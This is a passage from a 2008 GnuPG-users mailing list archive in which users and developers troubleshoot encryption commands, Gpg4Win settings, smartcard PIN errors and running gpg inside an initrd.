<17914321.post@talk.nabble.com> Hi there, I am trying to encrypt and I am using two different calls. One is successful and the other one fails. I need to perform the encryption via c# code and therefore I need the one that fails to work: This attempt to encrypt failed: C:\Program Files\GNU\GnuPG>gpg --homedir "C:\Program Files\GNU\GnuPG" --yes --batch --encrypt --armo r --recipient MyUserId --no-verbose gpg: tailgate: skipped: public key not found gpg: [stdin]: encryption failed: public key not found HOWEVER The following call succeeded: C:\Program Files\GNU\GnuPG>gpg -e -r MyUserId Enc\ToEnc.txt In addition I can see the key of MyUserId when I list the keys (using --list-keys) and I did sign the key so I am not really sure why the first attempt fails.. HELP!!! Thanks :) N -- View this message in context: http://www.nabble.com/Encryption-failed-in-one-command-but-succeeded-in-another...-tp17914321p17914321.html Sent from the GnuPG - User mailing list archive at Nabble.com. -------------- next part -------------- An HTML attachment was scrubbed... URL: From larry_seabrook at yahoo.com Wed Jun 18 01:08:49 2008 From: larry_seabrook at yahoo.com (Larry Seabrook) Date: Tue, 17 Jun 2008 16:08:49 -0700 (PDT) Subject: Gpg4Win: Setting TEXTMODE On ? Message-ID: <987213.7650.qm@web31003.mail.mud.yahoo.com> Hello,   We are using the Gpg4Win product for encrypting files.   The files we are encrypting and sending are text files with carriage-return and linefeed characters at the end of each line (record).  The receiver of these files needs the CR and LF characters preserved by the encryption-decryption process.  The files contain valid text data only.   When the file is decrypted by the receiver using another PGP-compliant product, the CR and LF characters are lost.   I BELIEVE we need to use the TEXTMODE=ON option when encrypting the file but the GUI for Gpg4Win does not reference this option.   QUESTION:  WILL Gpg4Win RECOGNIZE A PGP.CONF FILE CONTAINING "TEXTMODE=ON"?   (Please do a "Reply All" so that my work address is copied).   Thanks,   Larry       -------------- next part -------------- An HTML attachment was scrubbed... URL: From faramir.cl at gmail.com Wed Jun 18 13:05:29 2008 From: faramir.cl at gmail.com (Faramir) Date: Wed, 18 Jun 2008 07:05:29 -0400 Subject: Armor Icon Associated with 7-Zip Executable In-Reply-To: <1213764063.6671.9.camel@carbon> References: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com> <4857CE8E.7050305@bellsouth.net> <48580BD1.3060900@gmail.com> <48580F1A.2050606@bellsouth.net> <1213764063.6671.9.camel@carbon> Message-ID: <4858EBF9.4030200@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Sven Radde escribi?: > Am Dienstag, den 17.06.2008, 15:23 -0400 schrieb John W. Moore III: >> Ostensibly, next to or below the Application You downloaded was a Link >> to Download the Signature for the file. > > ?When looking at 7-zip.org and their Sourceforge site, I did not find > anything like a separate detached signature for download and downloading > the .exe was absolutely "normal". I didn't find the signature file too. But I returned to the download site, and tried again. With Firefox, there was the armored icon. With IE7, it was a normal file. Well, that is why I said it was a weird thing. But I am not the only one who saw that icon, so, I figure there should be an explanation... >> The icon You saw was merely the >> indicator that the File had been Signed. > > It is not possible to determine whether a detached signature exists by > merely looking at the original file. If that is true, then we are still looking for an explanation... Anyway, it is not like I won't be able to sleep thinking about the subject...(lol) Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIWOv5AAoJEMV4f6PvczxAEIoH/1Xcbe+yZK5WEMVcx5r0NNDD NwcUZx9gGDEQkqeRbg2Wd43oCfh1xYQalj+Zynq+B1crr1ytaBjDUTM4JO8bPg9Z TQly5d3x9uk0SIy07wbsJ84YUSl9TEacciPGtvspZ0i1zf4Gm74aQ27AM9e/wisl 3SjUF7skUqEs+rpduiXEFiq7Xjri+ZjlWhNNYv0/+I6Kv5tXO7COja/3yQVfseWe zoHLeDct1LOTh5bjxsZdHM7zsVyKLWTALDaoKOJPX0UPy1N7fvSd6MPFZnE7VUaK JVUSpEpdp5Gyb8x/IiJic3WSj4EcKeinsX1+PCmZoaTxMjkEV5CIwhoXpqJuxxI= =lTEf -----END PGP SIGNATURE----- From larry_seabrook at yamaha-motor.com Wed Jun 18 18:03:42 2008 From: larry_seabrook at yamaha-motor.com (Larry Seabrook) Date: Wed, 18 Jun 2008 09:03:42 -0700 Subject: TEXTMODE Option in Gpg4Win ? Message-ID: Hello, We are using the Gpg4Win product for encrypting files. The files we are encrypting and sending are text files with carriage-return and linefeed characters at the end of each line (record). The receiver of these files needs the CR and LF characters preserved by the encryption-decryption process. The files contain valid text data only. When the file is decrypted by the receiver using another PGP-compliant product, the CR and LF characters are lost. I BELIEVE we need to use the TEXTMODE=ON option when encrypting the file but the GUI for Gpg4Win does not reference this option, not can I find any reference to a Configuration File in the Gpg4Win GUI or documentation. QUESTION: How is TEXTMODE=ON or it's equivalent set when using Gpg4Win? Thanks, Larry -------------- next part -------------- An HTML attachment was scrubbed... URL: From clive.hunt at gmail.com Wed Jun 18 15:22:17 2008 From: clive.hunt at gmail.com (CliveSRT) Date: Wed, 18 Jun 2008 06:22:17 -0700 (PDT) Subject: removing (uninstalling) GNUPG / GPG4Win 1.1.0.407 In-Reply-To: References: Message-ID: <17982584.post@talk.nabble.com> There should be an entry in ADD & REMOVE Programs for the software installed. Not sure that messing with the registry would be a good idea. The error you are getting is because the program can no longer be found by Outlook. Suggest either reinstalling the application so as to replace the files or alternatively go to TOOLS and then OPTIONS then select OTHER and ADVANCED OPTIONS. Then click ADD-IN MANAGER and remove the tick from the item GPGol. Hope this helps. EduBu wrote: > > Hi there! > > How should I proceed, in order to completely uninstall GNUPG / GPG4Win > (version 1.1.0.407) from my system, without leaving any tracks of it in > the > Registry? I do not find anything at all of this program in the Control > Panel > ("Add/Remove Programs)". Neither do I find any "uninstall-file" in the > folder, in which the program has been installed ("C:\...\GNU\...). > > My Operating System is Windows XP Professional SP2. > > Remark: each time while opening Outlook (Brazilian-Portuguese version 2002 > SP3), there always appear a warning screen, saying (translated now, from > Portuguese to English) that the file "C:\...\GNU\GnuPG\gpgol.dll" can not > be > installed or loaded; furthermore, this warning message says that there > could > be insufficient memory, ore that the .dll file could not be found. As a > matter of fact, this "gpgol.dll" file is missing on my system. > > So, does anyone know how to remove this program correctly? Thanks! > > Eduardo Burkhard > > > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users > > -- View this message in context: http://www.nabble.com/removing-%28uninstalling%29-GNUPG---GPG4Win-1.1.0.407-tp17627003p17982584.html Sent from the GnuPG - User mailing list archive at Nabble.com. From faramir.cl at gmail.com Sat Jun 21 05:32:06 2008 From: faramir.cl at gmail.com (Faramir) Date: Fri, 20 Jun 2008 23:32:06 -0400 Subject: About my prefered settings... Message-ID: <485C7636.3040809@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Well, I have avoided messing with the preferences settings of gpg, since I don't fully understand how does it works, and I am a bit afraid of breaking something. In special, I don't want to deliver messages that can't be read by the recipient... I confess I am not good for console commands, it has been a long time since I knew how to work with ms-dos, so I have been using gpgshell to provide a GUI for gpg, and be able use it easily (I am a windows user). But now, I would like to know what cipher algorithms, hash function and compression I am using... and of course, I don't know how to know it. Is there a way to know, by looking at my public key (or sending some command to gpg), what is my preferred settings? Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIXHY2AAoJEMV4f6PvczxAWQ8H/3ep+HKK2y5Dk0OqjYGmqNB5 5S9iaO+P9LvEw/9JOrkEmFcGlZxy7CSXA+NLvxjQ9d6w1PSrIwuoAa1pxcQs4/Az yk5n3VnhpKFueU/o/TjfRT0qr+2XbaxN/Z0hebgQz3J+4u89+o2ktdOpILmqS50m QYfZSFpGT+3N/BvqHlmpQL7kY7/Iw6gKb6GtRf1tFMiAVx0vLicoZBLVRBPp4Y4Z DQOFlFeaVnm1ncwG7296rh+DurADLIc/eKvp8woJJCSQ3gRiUTm8KIvUKRetM+Vr z4ZDh9J8WprGszw5UO2He4AzhK3e9klqC+lyC5ERvkysfpMeNYXt99toKj7uvJI= =WExG -----END PGP SIGNATURE----- From faramir.cl at gmail.com Mon Jun 23 07:53:49 2008 From: faramir.cl at gmail.com (Faramir) Date: Mon, 23 Jun 2008 01:53:49 -0400 Subject: Testing (I got a "delayed message notification") Message-ID: <485F3A6D.6040302@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 And I wanted to test if the list is working, or if it is down... -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIXzptAAoJEMV4f6PvczxAAUQH/2F+84nOJJCcD6RXY94HKEgs nM6dTvkk8Ke5XN6CjmQs8E0sA9C1yRVKP9arnY3z8PczoG4EbGJjLx2QpWjD6etS lyzKfvZEX5YqXy2dF8lNxr2pAczadr9lfGY5fEM2t/vtCQrIE36PnoIxQpVmRU1i UuN4QyOmeA5TJZAGnYx0UtDeVAWuatKP8ARiLp6sfjJE92pklqIU6sdCzJmD3E/4 jWYKj5zYquTaiBQyHbKay5luQhGm+esbbbwFm9PtuxDEkoEL8j2ozfPOmuYifHYg ZgUNwOs0lJQddxgqjIeLUOGJgyw+wsVxYL0U6wVLa4iqbsNqeTZG1ey+QOvARhI= =p1ie -----END PGP SIGNATURE----- From christoph.anton.mitterer at physik.uni-muenchen.de Mon Jun 23 10:31:05 2008 From: christoph.anton.mitterer at physik.uni-muenchen.de (Christoph Anton Mitterer) Date: Mon, 23 Jun 2008 10:31:05 +0200 Subject: (possible) feature request ;-) Message-ID: <1214209865.10960.9.camel@etppc19> Hi. I'm writing a suite of scripts and a little frame work for the use cryptsetup/dm-crypt within an initrd for Debian This also includes a keyscript to decrypt (symmetrically) OpenPGP encrypted dm-crypt keys. I'm suggesting that such keys have the for-your-eyes flag set (because it shouldn't be necessary to write them to disk). gpg seems to always write that warning message (that the message is for your eyes only) even when writing to stdout (where stdout is a console) or when piping to a file. Switches like --quiet or so doesn't change this. Is it already possible to somehow suppress this message (without suppressing others like no-MDC or so)? If not would you consider to add a simple option? Thanks, Chris. From jmoore3rd at bellsouth.net Mon Jun 23 10:48:03 2008 From: jmoore3rd at bellsouth.net (John W. Moore III) Date: Mon, 23 Jun 2008 04:48:03 -0400 Subject: About my prefered settings... In-Reply-To: <485C7636.3040809@gmail.com> References: <485C7636.3040809@gmail.com> Message-ID: <485F6343.20604@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Faramir wrote: > But now, I would like to know what cipher algorithms, hash function and > compression I am using... and of course, I don't know how to know it. Is > there a way to know, by looking at my public key (or sending some > command to gpg), what is my preferred settings? Using GPGshell highlight Your Key and then look in the GPGshell icon toolbar and You'll see 'CLI' in the upper right corner. From it's drop down menu select: showpref You may also use the command showpref by highlighting Your Key and then choosing Edit > All Settings from the Right Click context Menu. JOHN ;) Timestamp: Monday 23 Jun 2008, 04:46 --400 (Eastern Daylight Time) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.5.0-svn4754: (MingW32) Comment: Public Key at: http://tinyurl.com/8cpho Comment: Gossamer Spider Web of Trust: https://www.gswot.org Comment: Homepage: http://tinyurl.com/yzhbhx iQEcBAEBCgAGBQJIX2NAAAoJEBCGy9eAtCsPZvoIAJdRNhgZRLzbmf+G38S5dD4A nr5dQWCWk3HsyKchZTjTrLWl494q9Mn7EjEPUn5FqfnqRZ/zXwtZvFtexNxlO8iv Qdn8jdUMx+erKazWiDjzefvjeg2brW+cuG+MzGhOpCBsx1XSQS1SpgC3uVwgbscS Y3ARrAa49yMd/8I1Jg6AVyufTKCGmREqjoJk/1VUTZp+9smXz7zuH1+oJ8mMuogB WGYAv+Z/vQZq7lYor7LgbfW6f/XcvfKVjyHKkl3MEtNy1oEd0RXfaC/5DolbgaMv vTFm3/iJO80U/2tU5WATnZ8E54G4z1NUa1vCgIMaF8IMIocuj8awNuohDVKQet0= =vq9D -----END PGP SIGNATURE----- From eddrobinson at gmail.com Mon Jun 23 11:18:52 2008 From: eddrobinson at gmail.com (Edward Robinson) Date: Mon, 23 Jun 2008 10:18:52 +0100 Subject: Oh Dear, Pin Entry Broken on openPGP card! Message-ID: <485F6A7C.2010204@gmail.com> Hello all, For some reason entering the pin to my smartcard card (for decrypting, signing, authenticating) has broken... $ gpg --card-status Returns, among the usual blurb this: PIN retry counter : 3 0 3. I am pretty sure that this should say 3 3 3 or 2 2 3 or 0 0 3. basically the first and second digit (which refer to the unlocking pin) should always be the same. 3 0 3 should not happen.... Whenever I enter my pin to decrypt something i get: $ gpg Desktop/myTest.txt.pgp gpg: detected reader `OmniKey CardMan 3121 00 00' PIN (Here pin-entry-gtk2 pops up and asks me for my pin, which I enter) gpg: verify CHV2 failed: invalid passphrase gpg: encrypted with ELG-E key, ID 00000000 gpg: encrypted with 1024-bit RSA key, ID 987D9D66, created 2008-04-25 "Edward Robinson " gpg: public key decryption failed: invalid passphrase gpg: decryption failed: secret key not available I am 100% sure I haven't forgotten the pin!!! I am definitely putting the correct pin in. $ gpg --edit-card Command> verify PIN (pinentrygtk2 asks for the pin, I enter it and get the following:) gpg: verify CHV2 failed: invalid passphrase So then I try this: $ gpg --change-pin 1 - change PIN 2 - unblock PIN 3 - change Admin PIN Q - quit Your selection? 2 gpg: sending command `SCD PASSWD' to agent failed: ec=6.32769 Error unblocking the PIN: general error I have no idea how to proceed, I can't unblock the pin (that is if it is even block CHV1 = 3 would suggest not...) $ dpkg -l |grep gnupg ii gnupg 1.4.6-2.2 GNU privacy guard - a free PGP replacement ii gnupg-agent 2.0.9-2 GNU privacy guard - password agent ii gnupg2 2.0.9-2 GNU privacy guard - a free PGP replacement ii python-gnupginterface 0.3.2-9 Python interface to GnuPG (GPG) $ dpkg -l |grep gpg ii gpgsm 2.0.9-2 GNU privacy guard - S/MIME version ii gpgv 1.4.6-2.2 GNU privacy guard - signature verification t ii libgpg-error0 1.4-2 library for common error values and messages ii libgpgme11 1.1.6-2 GPGME - GnuPG Made Easy $ dpkg -l |grep pinentry ii pinentry-curses 0.7.5-2 curses-based PIN or pass-phrase entry dialog ii pinentry-gtk2 0.7.5-2 GTK+-2-based PIN or pass-phrase entry dialog gpg-agent.conf: pinentry-program /usr/bin/pinentry-gtk-2 default-cache-ttl 10 enable-ssh-support gpg.conf: use-agent #default recipient is my encryption subkey default-recipient 0x987D9D66! #Hidden encryption to my 2048 subkey hidden-encrypt-to 0x87F568A7! #key to encrypt with by default default-key 0x3A5F0761! #KEY SERVER keyserver hkp://keyserver.ubuntu.com Any ideas?? Cheers, Edd From christoph.anton.mitterer at physik.uni-muenchen.de Sat Jun 21 21:46:34 2008 From: christoph.anton.mitterer at physik.uni-muenchen.de (Christoph Anton Mitterer) Date: Sat, 21 Jun 2008 21:46:34 +0200 Subject: gpg unusable from within an initrd Message-ID: <1214077594.3374.4.camel@fermat.scientia.net> Hi. I have to use gpg from within an initrd. /dev/tty is not available (an won't be) only /dev/console is here. But whatever I do gpg complains: Without --no-tty it complains that /dev/tty isn't there (gpg: cannot open '/dev/tty': No such device or address) With it, in complains "gpg: Sorry, no terminal at all requested - can't get input" It doesn't even work to redirect /dev/console to gpg e.g. gpg --quiet --no-greeting --no-default-keyring --keyring /dev/null --secret-keyring /dev/null --no-options --no-random-seed-file --no-use-agent --decrypt file < /dev/console > /dev/console 2>&1 (no matter whether with or without --no-tty) When using /dev/console as --passphrase-file this broke my whole system and the keyboard ... I hat to kill it... :-L Any ideas? Chris. From wk at gnupg.org Mon Jun 23 11:45:06 2008 From: wk at gnupg.org (Werner Koch) Date: Mon, 23 Jun 2008 11:45:06 +0200 Subject: Testing (I got a "delayed message notification") In-Reply-To: <485F3A6D.6040302@gmail.com> (faramir.cl@gmail.com's message of "Mon, 23 Jun 2008 01:53:49 -0400") References: <485F3A6D.6040302@gmail.com> Message-ID: <87ve00a3j1.fsf@wheatstone.g10code.de> On Mon, 23 Jun 2008 07:53, faramir.cl at gmail.com said: > And I wanted to test if the list is working, or if it is down... Disk full. Sorry for the trouble. Shalom-Salam, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From wk at gnupg.org Mon Jun 23 11:51:13 2008 From: wk at gnupg.org (Werner Koch) Date: Mon, 23 Jun 2008 11:51:13 +0200 Subject: (possible) feature request ;-) In-Reply-To: <1214209865.10960.9.camel@etppc19> (Christoph Anton Mitterer's message of "Mon, 23 Jun 2008 10:31:05 +0200") References: <1214209865.10960.9.camel@etppc19> Message-ID: <87r6aoa38u.fsf@wheatstone.g10code.de> On Mon, 23 Jun 2008 10:31, christoph.anton.mitterer at physik.uni-muenchen.de said: > I'm suggesting that such keys have the for-your-eyes flag set (because > it shouldn't be necessary to write them to disk). This flag is a property of the encrypted message and not of the key. I consider it as pretty useless because most people don't use gpg on the command line. > gpg seems to always write that warning message (that the message is for > your eyes only) even when writing to stdout (where stdout is a console) > or when piping to a file. No. The creator of the message asked to display this message and thus gpg does it. > Is it already possible to somehow suppress this message (without > suppressing others like no-MDC or so)? If not would you consider to add Ask the sender not to use --for-your-eyes-only and not to use a filename "_CONSOLE". Salam-Shalom, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From wk at gnupg.org Mon Jun 23 11:57:59 2008 From: wk at gnupg.org (Werner Koch) Date: Mon, 23 Jun 2008 11:57:59 +0200 Subject: Oh Dear, Pin Entry Broken on openPGP card! In-Reply-To: <485F6A7C.2010204@gmail.com> (Edward Robinson's message of "Mon, 23 Jun 2008 10:18:52 +0100") References: <485F6A7C.2010204@gmail.com> Message-ID: <87mylca2xk.fsf@wheatstone.g10code.de> On Mon, 23 Jun 2008 11:18, eddrobinson at gmail.com said: > Returns, among the usual blurb this: PIN retry counter : 3 0 3. I am pretty > sure that this should say 3 3 3 or 2 2 3 or 0 0 3. basically the first and > second digit (which refer to the unlocking pin) should always be the same. 3 > 0 3 should not happen.... The second retry counter is used for the second PIN. In general gpg tries to sync the second PIN with the first PIN but that may fail under some circumstances. Note, that it is not an unblocking PIN but the PIN for used for the decryption key. > $ gpg --change-pin > > 1 - change PIN > 2 - unblock PIN > 3 - change Admin PIN > Q - quit > > Your selection? 2 Try 1 (change PIN). This should sync it again. BTW, you may do the same by using $ gpg --card-edit Command> admin Command> passwd Shalom-Salam, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From wk at gnupg.org Mon Jun 23 11:59:48 2008 From: wk at gnupg.org (Werner Koch) Date: Mon, 23 Jun 2008 11:59:48 +0200 Subject: gpg unusable from within an initrd In-Reply-To: <1214077594.3374.4.camel@fermat.scientia.net> (Christoph Anton Mitterer's message of "Sat, 21 Jun 2008 21:46:34 +0200") References: <1214077594.3374.4.camel@fermat.scientia.net> Message-ID: <87ej6oa2uj.fsf@wheatstone.g10code.de> On Sat, 21 Jun 2008 21:46, christoph.anton.mitterer at physik.uni-muenchen.de said: > With it, in complains "gpg: Sorry, no terminal at all requested - can't > get input" Add option "--batch". Salam-Shalom, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From faramir.cl at gmail.com Mon Jun 23 11:59:44 2008 From: faramir.cl at gmail.com (Faramir) Date: Mon, 23 Jun 2008 05:59:44 -0400 Subject: About my prefered settings... In-Reply-To: <485F6343.20604@bellsouth.net> References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> Message-ID: <485F7410.4040901@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 John W. Moore III escribi?: > Faramir wrote: > >> But now, I would like to know what cipher algorithms, hash function and >> compression I am using... and of course, I don't know how to know it. Is >> there a way to know, by looking at my public key (or sending some >> command to gpg), what is my preferred settings? > > Using GPGshell highlight Your Key and then look in the GPGshell icon > toolbar and You'll see 'CLI' in the upper right corner. From it's drop > down menu select: showpref > > You may also use the command showpref by highlighting Your Key and then > choosing Edit > All Settings from the Right Click context Menu. Thanks, I did it, and found the following: Cifrado: AES256, AES192, AES, CAST5, 3DES (cipher) Resumen: SHA1, SHA256, RIPEMD160 (hashing) Compresi??n: ZLIB, BZIP2, ZIP, Sin comprimir [no compression] (compression) Caracter??sticas: MDC, Sevidor de claves no-modificar (settings, maybe?) Well, it seems I have not messed the config (yet)... Now the question is: how do I set a "default prefered ^thing to use^" without making unavailable the other algorithms? The idea is to use the custom setting only when the recipient can receive messages using these settings... I think I'd like to use AES256, SHA256, and ZIP, but only if that doesn't produce unusable messages... Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIX3QQAAoJEMV4f6PvczxAF5UH/1SiK1An6ygyrK3df1E+Q7n4 vWFMgbx6UH1mUkhoubELVBXZ3tDbqUbZernywQmMb2twuY+zzFJqy/78Jbsvduey Tcwr6x1/8EH4T0YcQIbYdTppn7klMDFIU5HkEIRWGc0c1WRZYqawY1VIiRIdMa49 LGsUlbHe+To5m2t/KjfE1niiDmSOTknvdFpiZkE0kvtsNogiR6zpS1DlwaCBnSeA g6oGqUQv/fJ0b5JdzS4BeGcUYm0iY6LKyjriGt42gftWxPKgCb/gXLRTkjR2NLFR x+VjdACpXUiPZBWvHIeWxaQDoJ2iX0fneygsp/9A+2h+yS2N4sa+gsoCLpZK8D0= =8Hag -----END PGP SIGNATURE----- From eddrobinson at gmail.com Mon Jun 23 12:36:14 2008 From: eddrobinson at gmail.com (Edward Robinson) Date: Mon, 23 Jun 2008 11:36:14 +0100 Subject: Oh Dear, Pin Entry Broken on openPGP card! In-Reply-To: <87mylca2xk.fsf@wheatstone.g10code.de> References: <485F6A7C.2010204@gmail.com> <87mylca2xk.fsf@wheatstone.g10code.de> Message-ID: <485F7C9E.7030109@gmail.com> Werner, thanks for your quick reply (as usual!). > Try 1 (change PIN). This should sync it again. BTW, you may do the same by > using > > $ gpg --card-edit > Command> admin > Command> passwd $ gpg --change-pin gpg: OpenPGP card no. D27600012401010100010000101E0000 detected 1 - change PIN 2 - unblock PIN 3 - change Admin PIN Q - quit Your selection? 1 [When pinentry pops up it says: "Please enter the PIN (`PIN') to unlock the card". I then enter my pin, the box closes and the terminal repsonds with:] gpg: sending command `SCD PASSWD' to agent failed: ec=6.130 Error changing the PIN: general error From sattva at pgpru.com Mon Jun 23 12:45:27 2008 From: sattva at pgpru.com (Vlad "SATtva" Miller) Date: Mon, 23 Jun 2008 17:45:27 +0700 Subject: gpg unusable from within an initrd In-Reply-To: <87ej6oa2uj.fsf@wheatstone.g10code.de> References: <1214077594.3374.4.camel@fermat.scientia.net> <87ej6oa2uj.fsf@wheatstone.g10code.de> Message-ID: <485F7EC7.2030509@pgpru.com> Werner Koch (23.06.2008 16:59): > On Sat, 21 Jun 2008 21:46, > christoph.anton.mitterer at physik.uni-muenchen.de said: > >> With it, in complains "gpg: Sorry, no terminal at all requested - can't >> get input" > > Add option "--batch". Or, if interactive mode is desired, place this in your initrd script: mv /dev/tty /dev/tty.bak cp -a /dev/console /dev/tty # # do gpg stuff here # rm /dev/tty mv /dev/tty.bak /dev/tty -- SATtva | security & privacy consulting www.vladmiller.info | www.pgpru.com -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 513 bytes Desc: OpenPGP digital signature URL: From Yasuhiro.Funaki at safenet-inc.com Fri Jun 20 13:15:14 2008 From: Yasuhiro.Funaki at safenet-inc.com (Funaki, Yasuhiro) Date: Fri, 20 Jun 2008 19:15:14 +0800 Subject: Session Key algorithm Message-ID: <8919D897E400EC4A85E30E35FFBF702018A34C@pok1exch002.sfnt.local> Dear Expert, I am wondering that which algorithm is used for the session key in GnuPG 1.4.8? I understand the session key is symmetric key and used for message encryption, my concern is the compatibility with PGP commercial. i.e PGP commercial use IDEA but GnuPG does not have it, then message can not be decrypted with Gnupg?? Have a nice day. Yasuhiro The information contained in this electronic mail transmission may be privileged and confidential, and therefore, protected from disclosure. If you have received this communication in error, please notify us immediately by replying to this message and deleting it from your computer without copying or disclosing it. From e.robinson at cs.bham.ac.uk Sun Jun 22 13:59:50 2008 From: e.robinson at cs.bham.ac.uk (Edward Robinson) Date: Sun, 22 Jun 2008 12:59:50 +0100 Subject: Oh Dear, Pin Entry Broken on openPGP card! Message-ID: <485E3EB6.5020602@cs.bham.ac.uk> Hello all, For some reason entering the pin to my smartcard card (for decrypting, signing, authenticating) has broken... $ gpg --card-status Returns, among the usual blurb this: PIN retry counter : 3 0 3. I am pretty sure that this should say 3 3 3 or 2 2 3 or 0 0 3. basically the first and second digit (which refer to the unlocking pin) should always be the same. 3 0 3 should not happen.... Whenever I enter my pin to decrypt something i get: $ gpg Desktop/myTest.txt.pgp gpg: detected reader `OmniKey CardMan 3121 00 00' PIN (Here pin-entry-gtk2 pops up and asks me for my pin, which I enter) gpg: verify CHV2 failed: invalid passphrase gpg: encrypted with ELG-E key, ID 00000000 gpg: encrypted with 1024-bit RSA key, ID 987D9D66, created 2008-04-25 "Edward Robinson " gpg: public key decryption failed: invalid passphrase gpg: decryption failed: secret key not available I am 100% sure I haven't forgotten the pin!!! I am definitely putting the correct pin in. $ gpg --edit-card Command> verify PIN (pinentrygtk2 asks for the pin, I enter it and get the following:) gpg: verify CHV2 failed: invalid passphrase So then I try this: $ gpg --change-pin 1 - change PIN 2 - unblock PIN 3 - change Admin PIN Q - quit Your selection? 2 gpg: sending command `SCD PASSWD' to agent failed: ec=6.32769 Error unblocking the PIN: general error I have no idea how to proceed, I can't unblock the pin (that is if it is even block CHV1 = 3 would suggest not...) $ dpkg -l |grep gnupg ii gnupg 1.4.6-2.2 GNU privacy guard - a free PGP replacement ii gnupg-agent 2.0.9-2 GNU privacy guard - password agent ii gnupg2 2.0.9-2 GNU privacy guard - a free PGP replacement ii python-gnupginterface 0.3.2-9 Python interface to GnuPG (GPG) $ dpkg -l |grep gpg ii gpgsm 2.0.9-2 GNU privacy guard - S/MIME version ii gpgv 1.4.6-2.2 GNU privacy guard - signature verification t ii libgpg-error0 1.4-2 library for common error values and messages ii libgpgme11 1.1.6-2 GPGME - GnuPG Made Easy $ dpkg -l |grep pinentry ii pinentry-curses 0.7.5-2 curses-based PIN or pass-phrase entry dialog ii pinentry-gtk2 0.7.5-2 GTK+-2-based PIN or pass-phrase entry dialog gpg-agent.conf: pinentry-program /usr/bin/pinentry-gtk-2 default-cache-ttl 10 enable-ssh-support gpg.conf: use-agent #default recipient is my encryption subkey default-recipient 0x987D9D66! #Hidden encryption to my 2048 subkey hidden-encrypt-to 0x87F568A7! #key to encrypt with by default default-key 0x3A5F0761! #KEY SERVER keyserver hkp://keyserver.ubuntu.com Any ideas?? Cheers, Edd From calestyo at scientia.net Sat Jun 21 22:35:03 2008 From: calestyo at scientia.net (Christoph Anton Mitterer) Date: Sat, 21 Jun 2008 22:35:03 +0200 Subject: gpg unusable from within an initrd In-Reply-To: <1214077594.3374.4.camel@fermat.scientia.net> References: <1214077594.3374.4.camel@fermat.scientia.net> Message-ID: <1214080503.3374.10.camel@fermat.scientia.net> I've just seen: On Sat, 2008-06-21 at 21:46 +0200, Christoph Anton Mitterer wrote: > /dev/tty is not available (an won't be) /dev/tty is there (5,0) and readable. No idea which problems gpg has... :-/ Chris. -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 5108 bytes Desc: not available URL: From niknot at gmail.com Fri Jun 20 06:51:00 2008 From: niknot at gmail.com (Nik N) Date: Fri, 20 Jun 2008 04:51:00 +0000 Subject: Remove public key from secret key In-Reply-To: References: <48551C98.3070809@digitalbrains.com> Message-ID: <328a5cf40806192151u47144186kfafac8db10e0a0fd@mail.gmail.com> Isn't this the case where symmetric encryption would be a perfectly adequate solution? NikNot From christoph.anton.mitterer at physik.uni-muenchen.de Mon Jun 23 13:30:18 2008 From: christoph.anton.mitterer at physik.uni-muenchen.de (Christoph Anton Mitterer) Date: Mon, 23 Jun 2008 13:30:18 +0200 Subject: (possible) feature request ;-) In-Reply-To: <87r6aoa38u.fsf@wheatstone.g10code.de> References: <1214209865.10960.9.camel@etppc19> <87r6aoa38u.fsf@wheatstone.g10code.de> Message-ID: <1214220618.10960.138.camel@etppc19> On Mon, 2008-06-23 at 11:51 +0200, Werner Koch wrote: > > I'm suggesting that such keys have the for-your-eyes flag set (because > > it shouldn't be necessary to write them to disk). > This flag is a property of the encrypted message and not of the key. Of course,.. with "key", I didn't meant any OpenPGP key,.. and of course not the dm-crypt key itself,.. but the encrypted dm-crypt key... > > Is it already possible to somehow suppress this message (without > > suppressing others like no-MDC or so)? If not would you consider to add > > Ask the sender not to use --for-your-eyes-only and not to use a > filename "_CONSOLE". There is no "sender" (at least from the classic point of view)... I simply use gpg's/OpenPGP's symmetric encryption parts (to be exact: a symmetrically encrypted data packet, with symmetrically encrypted session key packets). I set the flag, that nobody writes the key to disk (by accident) if he uses gpg manually on the encrypted file. But when I decrypt it in the intended scripts I'd like to suppres the warning... Chris. From christoph.anton.mitterer at physik.uni-muenchen.de Mon Jun 23 13:31:50 2008 From: christoph.anton.mitterer at physik.uni-muenchen.de (Christoph Anton Mitterer) Date: Mon, 23 Jun 2008 13:31:50 +0200 Subject: gpg unusable from within an initrd In-Reply-To: <87ej6oa2uj.fsf@wheatstone.g10code.de> References: <1214077594.3374.4.camel@fermat.scientia.net> <87ej6oa2uj.fsf@wheatstone.g10code.de> Message-ID: <1214220710.10960.141.camel@etppc19> On Mon, 2008-06-23 at 11:59 +0200, Werner Koch wrote: > Add option "--batch". Doesn't this disable any interactions like entering the passphrase? Thanks, Chris. From christoph.anton.mitterer at physik.uni-muenchen.de Mon Jun 23 13:33:09 2008 From: christoph.anton.mitterer 